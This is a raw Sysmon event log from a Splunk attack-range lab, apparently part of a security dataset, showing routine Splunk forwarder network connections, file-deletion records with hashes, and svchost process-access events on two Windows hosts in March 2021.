21:51:04.614{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57269-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000638793Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:08.569{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35B15D629561D81C0B355990AB4D216B,SHA256=28E8545364B4D6A1669587A20DF14E8C921DD04B7CDFF1116C9CF4DEA980F3BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918503Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:08.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918502Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:08.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918501Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:08.412{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F73FA0DFC067D8431F18EAB0FD5FA0,SHA256=71CA22C0C544397F883FE8840820F063D40AE9989F26FDE33AEE6D766877A046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638792Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:08.381{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E70C18B386AECB73C8F11AC46DE48951,SHA256=E95B54B649316F0A6F5FBC2D8713B7D3B4447B3690E8343115305B0DF0BCE4AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638795Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:09.615{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C3C5631FCD10426C6E70F4CD27C2AEA,SHA256=A647D880DF0CA47DFD0BE08BAACFE1E26E395AA88C107F538B4FB291F8264E20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918506Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:09.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918505Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:09.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918504Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:09.482{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81DB1E0B4086314005A32C76F49C5ED9,SHA256=E244031A379FBD105FAB98C30243191DD7D8830D43214FCF677CEC497D6EFFF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638797Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:10.631{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D69F9E1D17F60473F1C649F9655D209,SHA256=23AFE841A841D4653D15B3ECAF5CEF021286807317446B0DD263AAA659D1E832,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918509Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:10.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918508Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:10.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918507Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:10.532{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5561AB6246CA000DE51C39C8124E40C0,SHA256=8B2FF5957D14396747C5C8525FAD013405C7BC8FA6E7CE932FAE8A58BF3DE73B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638796Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:10.069{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C13F7F0BC19495C889649AA07C08C46F,SHA256=D9A037D75AFC6F452DE0F0672128BBAAC6574067DC0FABE8F69C5972F45A4A25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638799Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:11.647{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B280C2B2EF0E9219819990B3DEFB43,SHA256=378725DD0B1FD22E49B08F660E8A174BE66465D7FB8109C6219A43FB72871865,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918512Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:11.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918511Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:11.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918510Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:11.549{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E78854D5925EFE99BF6E7E17222D5F,SHA256=A4643A8C732585AD3049F0EBAD883C291576A8B2DE07B150C0A043F3AE1BAC88,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638798Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:06.348{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57270-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638800Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:12.678{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED1ED0A7B911385ECC07894B30F63DFE,SHA256=7437F04C33E6B109C2EA1204D6335D24C0F0B4DF6E510472F752DAF77BE96C4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918517Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:12.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918516Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:12.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918515Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:12.553{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=507F0A391A32F598200D3837745F388F,SHA256=026B87823E0E91C965AE6526A1EA792D228FD22BBDB993BDF2763265C18ADCF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918514Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:12.235{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C73B46D72E1092BA578A3B49C2D5583,SHA256=0E71C6C5F035E7AC713A7E8BF5368CE4A826B648370113290008FE3A2C04297B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918513Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:12.234{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F812357FDAF2BE2790B334FA93047148,SHA256=B59BBD2E6FECAEF9D5B58886E822CB8C87EEEC41F5C2AE4380B3792050BC93AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918521Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:13.785{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=406064608D2BA4693D2548B48EB7EA49,SHA256=156B7ECBDD454B17A67131DBC92821BBD91146FE957EE3B3DE8DF10134AC2F0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638801Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:13.694{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4893BB4A94D07B577EC5E9BD0101F80,SHA256=8CE8679046ABEFB0A7B5761AA6A6BBE7AC9E62F303D90FDB785D2B712CBA2004,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918520Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:13.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918519Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:13.754{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918518Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:09.904{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1054-false10.0.1.12-8000- 23542300x80000000000000005918525Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:14.874{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C73B46D72E1092BA578A3B49C2D5583,SHA256=0E71C6C5F035E7AC713A7E8BF5368CE4A826B648370113290008FE3A2C04297B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918524Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:14.852{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=816B5020AD3A6A24AC0B33B546604210,SHA256=D651284E563CD339C0E0BC798B65C95BB5F48B42C9F4AF72A18242964C21F288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638802Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:14.694{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3FA99BE58814EC490AE9ED52B76D616,SHA256=C583F7B7A99E32358549C6DA646B2B0FA5A69ECAA1415ED639073C6B35DE0050,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918523Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:14.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918522Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:14.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918529Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:15.951{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55113E7877046A8B4CBF4CEB31B4110B,SHA256=5F37FCAD0222ECE4856EBC424F49D6A5C64BBAA236938F4440E695288DECC22A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638805Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:15.709{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D037985E18DA61787D2FDB3C2CF11CB0,SHA256=A91C6D12DC1E11FEAC09709526170502C7844F106E151743A99C719448B0C823,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918528Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:15.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918527Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:15.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918526Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:12.550{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local51270- 23542300x8000000000000000638804Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:15.100{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=610155B7F1C7574256D3B95C92F1E4DD,SHA256=BD72FEAF479922952AE8517C447D29969408E5ACB350A5B0DF501CA2F02D2389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638803Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:15.100{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=46EAB8EBEC91CE572CFE85D209CFE115,SHA256=869FF1EECBBD0987C9A20D43F54A5D1A6E03CA53BA4E8B3C1C940491606FC736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638807Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:16.725{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B31407B2426985C8F93E7F71F56A425,SHA256=FB90ACD2FFFEA85A89E7F7D109240AF1EF87D392DCBAB1CB2E25F61414E8DB72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918531Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 